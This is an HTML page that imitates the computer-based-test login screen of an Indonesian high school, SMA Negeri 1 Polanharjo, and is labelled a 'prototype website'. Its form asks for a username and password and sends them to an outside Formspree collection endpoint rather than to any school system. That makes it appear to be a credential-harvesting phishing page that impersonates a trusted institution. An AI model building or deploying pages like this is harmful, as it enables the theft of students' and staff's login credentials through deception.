<!DOCTYPE HTML>
<html lang="en">
<head>
  <meta charset="utf-8" />
<meta name="viewport" content='width=device-width, initial-scale=1.0, user-scalable=1.0, minimum-scale=1.0, maximum-scale=5.0' />
<meta name="author" content="Adi Sulistiyanto" />
<meta name="keywords" content="HTML, CSS, Javascript, PHP" />
<meta name="description" content="Prototype website" />
<link rel="icon" type="image/x-icon" href="/images/favicon.png" />

<title>Adi Sulistiyanto</title>
<style>
body {
font-family: Arial;
background-color: #ecf0f3;
}
.header {
text-align: center;
margin: 30px 0px 0px 0px;
}
.header img {
height: 80px;
width: 60px;
}
.header h3 {
font-size: 15px;
font-weight: 300;
}
.login {
width: 80% auto;
line-height: 70px;
border: none;
margin: 10px 5px 0px 5px;
border-radius: 30px;
background: #ecf0f3;
box-shadow:
-6px -6px 6px rgba(255, 255, 255, 0.8),
6px 6px 6px rgba(0, 0, 0, 0.2);
}
.login h2 {
text-align: center;
font-size: 20px;
font-weight: 300
}
.login p {
padding: 0px 0px 0px 20px;
text-align: left;
font-size: 15px;
line-height: 1.5;
font-weight: 300;
margin-top:-20px;
}
.form {
color: #555;
border: none;
outline: none;
resize: none;
background: none;
border-radius: 20px;
padding: 15px 0px 15px 15px;
margin: 0px 0px 10px 15px;
width: 85%;
font-size: 14px;
background: #e0e0e0;
box-shadow: inset 5px 5px 5px #cbced1,
inset -5px -5px 5px #ffffff;
}
.form:focus{
color: #666;
background: #e6e6e6;
}
.form::placeholder{
color: #555;
}
.form:focus::placeholder {
color: #666;
}
#tombol {
outline: none;
border: none;
margin: 0px 0px 50px 15px;
width: 150px;
height: 40px;
border-radius: 30px;
font-weight: 400;
background: #ecf0f3;
box-shadow:
-6px -6px 6px rgba(255, 255, 255, 0.8),
6px 6px 6px rgba(0, 0, 0, 0.2);
transition: 0.5s;
}
#tombol:hover {
  box-shadow: inset 6px 6px 10px 0 rgba(0, 0, 0, 0.2),
    inset -6px -6px 10px 0 rgba(255, 255, 255, 0.5);
}
}
#tombol:active {
  box-shadow: inset 6px 6px 10px 0 rgba(0, 0, 0, 0.2),
    inset -6px -6px 10px 0 rgba(255, 255, 255, 0.5);
}
}
</style>

</head>

<body>

<div class="header">
<h3>SMA NEGERI 1 POLANHARJO <br />CBT APLICATION</h3>
<img src="https://user-images.githubusercontent.com/109278975/179359106-19d392d0-3d1e-4166-9c69-7160607d98e6.png"/>
</div>
<form class="login" action="https://formspree.io/f/xayvgrgp" method="POST" autocomplete="off">
<h2>Selamat datang</h2><p>
Silahkan login dengan username dan password yang telah anda miliki.
</p>
<input class="form" type="text" name="Username" placeholder="Username">
<input class="form" type="password" name="Password" placeholder="Password" />
<input id="tombol" type="submit" value="Logim" />
</form>
</body>

</html>
